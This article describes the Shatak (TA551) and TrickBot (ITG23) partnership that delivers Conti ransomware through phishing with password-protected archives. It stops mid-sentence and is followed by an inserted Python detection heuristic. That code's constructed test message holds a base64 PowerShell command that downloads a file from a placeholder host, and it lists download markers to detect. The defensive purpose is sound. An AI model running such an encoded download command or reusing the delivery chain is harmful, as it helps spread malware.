TrickBot and Shatak: the New Partnership in the Conti Ransomware Saga

Conti ransomware attacks seem to have been taken to another level: two threat actor groups have started to collaborate, joining efforts to deploy Conti ransomware on targeted systems. The first gang, dubbed Shatak or TA551, has started cooperating with another threat actor group named ITG23, also known as Wizard Spider or TrickBot.

How Does This Partnership Between Threat Actors Unfold?

According to an IBM X-Force discovery, the two gangs started their collaboration in July of this year.

As BleepingComputer describes, the usual attack carried out through this partnership by the two gangs unfolds like this:

Shatak is the one responsible for delivering the phishing email. The malicious email carries a compromised file inside a password-protected archive. Common Shatak attacks use stolen reply-chain emails supplemented with these password-protected attachments. Inside the malicious attachments lie compromise scripts. These scripts perform code execution: the code is base64-encoded and eventually results in downloading from a remote website and deploying the TrickBot malware or the malware dubbed BazarBackdoor. After one
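As an added example, not part of the article nor of any IBM X-Force or BleepingComputer material, the following Python triage heuristic scores an inbound message against the delivery chain just described: a reply-chain subject, a password handed over in the body, an archive attachment, and a script that decodes a base64 payload which reaches out to a remote URL. The `Message` type, the marker lists and both sample messages are constructed for illustration; a real mail gateway would feed it parsed MIME parts and the already-extracted archive contents.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass
class Message:
    """Hypothetical, simplified mail record (not a real MIME parser)."""
    subject: str
    body: str
    attachments: Dict[str, bytes]  # filename -> content; archive members appear extracted


ARCHIVE_EXTS = (".zip", ".rar", ".7z", ".iso")
SCRIPT_EXTS = (".js", ".vbs", ".hta", ".ps1", ".wsf", ".cmd", ".bat")
# A password (or passcode) handed over in the mail body, e.g. "password: 1234".
PASSWORD_HINT = re.compile(r"\bpass(word|code)?\b\s*[:=]?\s*\S+", re.IGNORECASE)
# Runs of base64 alphabet long enough to hold a small command.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Substrings that, once a payload is decoded, point at a remote download.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "webclient", "bitstransfer", "xmlhttp", "http://", "https://")


def decode_candidates(blob: str) -> Iterator[str]:
    """Yield plausible text decodings of a base64 blob: UTF-8 and UTF-16LE
    (PowerShell's -EncodedCommand carries UTF-16LE)."""
    stripped = blob.rstrip("=")
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return
    for encoding in ("utf-8", "utf-16le"):
        try:
            yield raw.decode(encoding)
        except UnicodeDecodeError:
            continue


def script_indicators(text: str) -> List[Tuple[List[str], str]]:
    """For every base64 blob in a script, return the download markers found in
    a decoding of it together with that decoded text."""
    hits = []
    for blob in B64_BLOB.findall(text):
        for decoded in decode_candidates(blob):
            lowered = decoded.lower()
            found = [m for m in DOWNLOAD_MARKERS if m in lowered]
            if found:
                hits.append((found, decoded))
    return hits


def score_message(msg: Message) -> List[str]:
    """Return the reasons a message matches the password-protected-archive
    plus encoded-download-script delivery pattern; empty list means no match."""
    reasons = []
    if PASSWORD_HINT.search(msg.body):
        reasons.append("password supplied in message body")
    if msg.subject.lower().startswith(("re:", "fw:", "fwd:")):
        reasons.append("reply-chain subject")
    for name, data in msg.attachments.items():
        lname = name.lower()
        if lname.endswith(ARCHIVE_EXTS):
            reasons.append(f"archive attachment {name}")
        if lname.endswith(SCRIPT_EXTS):
            for markers, _decoded in script_indicators(data.decode("utf-8", "replace")):
                reasons.append(f"{name}: base64 payload with {', '.join(markers)}")
    return reasons


def is_suspicious(msg: Message) -> bool:
    """Two or more independent signals are required before flagging."""
    return len(score_message(msg)) >= 2


def build_sample() -> Message:
    """Constructed lure, not a real capture: reply-chain subject, archive
    password in the body, and an extracted script holding a base64 UTF-16LE
    command that fetches a file from a placeholder host."""
    command = "Invoke-WebRequest http://example.invalid/update.bin".encode("utf-16le")
    encoded = base64.b64encode(command).decode()
    script = f"' constructed fixture\npowershell -EncodedCommand {encoded}\n"
    return Message(
        subject="RE: invoice for October",
        body="Hi, the document is attached. Archive password: 123456",
        attachments={
            "invoice.zip": b"\x00",            # placeholder for the archive bytes
            "invoice.vbs": script.encode(),    # member extracted from the archive
        },
    )


def build_benign() -> Message:
    """Constructed harmless message for contrast."""
    return Message(subject="Lunch on Friday?", body="Does 12:30 work?",
                   attachments={"menu.pdf": b"%PDF-1.4"})


if __name__ == "__main__":
    for label, msg in (("lure", build_sample()), ("benign", build_benign())):
        print(label, is_suspicious(msg), score_message(msg))
```

The UTF-16LE decoding step matters: the same bytes decode "successfully" as UTF-8 with interleaved NULs, which hides every marker, so a scanner that only tries one text encoding misses the most common encoded-command form. Thresholding on two independent signals keeps a lone "password" mention in a legitimate reply from raising an alert.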
